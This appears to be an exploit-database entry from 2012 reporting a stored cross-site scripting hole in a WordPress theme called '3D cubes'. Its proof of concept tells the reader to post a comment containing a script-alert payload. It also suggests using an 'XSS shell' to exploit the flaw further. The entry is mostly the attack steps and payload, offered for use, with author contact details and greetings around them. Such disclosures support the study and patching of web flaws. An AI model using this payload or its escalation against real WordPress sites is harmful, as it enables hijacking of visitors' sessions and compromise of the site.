id: 18371
date: 05/27/2012
title: Wordpress 3D cubes Theme  XSS Vulnerability
author: Lo$T
cves: 

+-----------------------------------------------------------+
# Exploit Title      : Title: XSS Vulnerability In Wordpress 3D cubes  Theme
# Software Link      : http://test.qualitywordpress.com/wp-content/themes/3dcubes/images/download.zip
# Date               : 27/05/2012
# Author             : Lo$t
# Facebook           : http://www.facebook.com/wily.tomson
# Facebook page      : http://www.facebook.com/TriplexDz
# Email              : h_ck@live.fr or t3t@hotmail.fr
# Tested on          : Windows Xp sp3  In Localhost
+-----------------------------------------------------------+
[~] Exploit/p0c :

Go Here
http://localhost/wordpress/?cat=1 or http://localhost/wordpress/?p=1 dont care

and Add New Comment
in ur comment write this <script>alert("XSS")</script>
and Submit Comment

U Can Use Xss Shell For Exploit
+--------------------------------------------------+
[»] Greetz to : Hacker-1420 and all my Friends
---------------------------------------------------+



#  0day.today [2023-03-26]  #